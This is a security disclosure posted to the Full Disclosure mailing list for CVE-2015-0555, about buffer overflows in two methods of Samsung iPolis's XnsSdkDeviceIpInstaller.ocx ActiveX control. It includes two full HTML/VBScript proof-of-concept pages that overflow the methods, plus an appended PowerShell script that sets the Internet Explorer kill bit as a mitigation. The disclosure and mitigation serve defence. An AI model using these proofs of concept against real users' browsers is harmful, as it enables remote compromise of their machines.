Message-ID: <CABjjeykNjzrw664YGkrpbiuq+8EZaDmcmc3Q1+yV9JgRy2U=hw@mail.gmail.com>
Date: Sat, 21 Feb 2015 00:47:20 +0530
From: Praveen D <praveend.hac@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities

CVE-2015-0555

Introduction
*************************************************************
There is a Buffer Overflow Vulnerability which leads to Remote Code Execution.
Vulnerability is due to input validation to the API ReadConfigValue and WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx

This is different from CVE-2014-3911 as the version of iPolis 1.12.2 (latest as of 12/12/2014). CVE-2014-3911 is related to different ActiveX and on older iPolis version

Discovery Method: Fuzzing
Exploiting: It is a client side attack where attacker can host a crafted HTML web page with malicious payload and entice the victim to browse to the hosted page to compromise the victim.
Operating System: Windows 7 Ultimate N SP1
*************************************************************

Vulnerability1:
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution*

******************Proof of Concept (PoC)***************
</html>
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() Remote Code Execution</head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName = "ReadConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 1
arg1=String(1044, "A")
target.ReadConfigValue arg1
</script>
</html>
*****************************************************************************************

*Vulnerability2: *
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution *

*******************Proof of Concept (PoC)*********************
<html>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 2
arg1=String(14356, "A")
arg2="defaultV"
target.WriteConfigValue arg1 ,arg2
</script></job></package>
</html>
****************************************************************************

CERT contacted Samsung but there wasn't any response from Samsung.
Refer http://blog.disects.com for more details

Best Regards,
Praveen Darshanam

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
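
A mitigation for the web-page vector described in the message above, as an added example that is not part of the original post: a PowerShell audit that reports whether the control with the CLSID from both PoCs is registered machine-wide and whether Internet Explorer's kill bit is set for it, and sets the kill bit when run with -Apply. The function names and the -Apply switch are illustrative; the registry location and the 0x400 flag are the standard Internet Explorer "ActiveX Compatibility" kill-bit mechanism.

```powershell
# Added example, not from the original post. Run from an elevated prompt.
# Audits by default; pass -Apply to set the kill bit. Names are illustrative.
param([switch]$Apply)

$Clsid   = '{D3B78638-78BA-4587-88FE-0537A0825A72}'       # classid used in both PoCs
$KillBit = 0x400                                          # kill-bit flag in "Compatibility Flags"
$Views   = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node' # 64-bit and 32-bit registry views

function Get-CompatFlags([string]$Key) {
    # Returns the DWORD, or $null when the key or the value does not exist.
    (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
}

function Set-KillBit([string]$Key) {
    if (-not (Test-Path -Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    # OR the flag in so that any other compatibility flags already present are kept.
    $new = [int](Get-CompatFlags $Key) -bor $KillBit
    New-ItemProperty -Path $Key -Name 'Compatibility Flags' -PropertyType DWord -Value $new -Force | Out-Null
}

$report = foreach ($view in $Views) {
    if (-not (Test-Path -Path $view)) { continue }        # no WOW6432Node on 32-bit Windows
    $compatKey = "$view\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $serverKey = "$view\Classes\CLSID\$Clsid\InprocServer32"
    if ($Apply) { Set-KillBit $compatKey }
    $flags = Get-CompatFlags $compatKey
    [pscustomobject]@{
        View       = $view
        Registered = Test-Path -Path $serverKey           # machine-wide COM registration present?
        Flags      = if ($null -ne $flags) { '0x{0:X}' -f $flags } else { '(not set)' }
        KillBitSet = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
    }
}
$report | Format-Table -AutoSize
```

The kill bit stops Internet Explorer from instantiating the control from web content; it does not remove or patch XnsSdkDeviceIpInstaller.ocx itself.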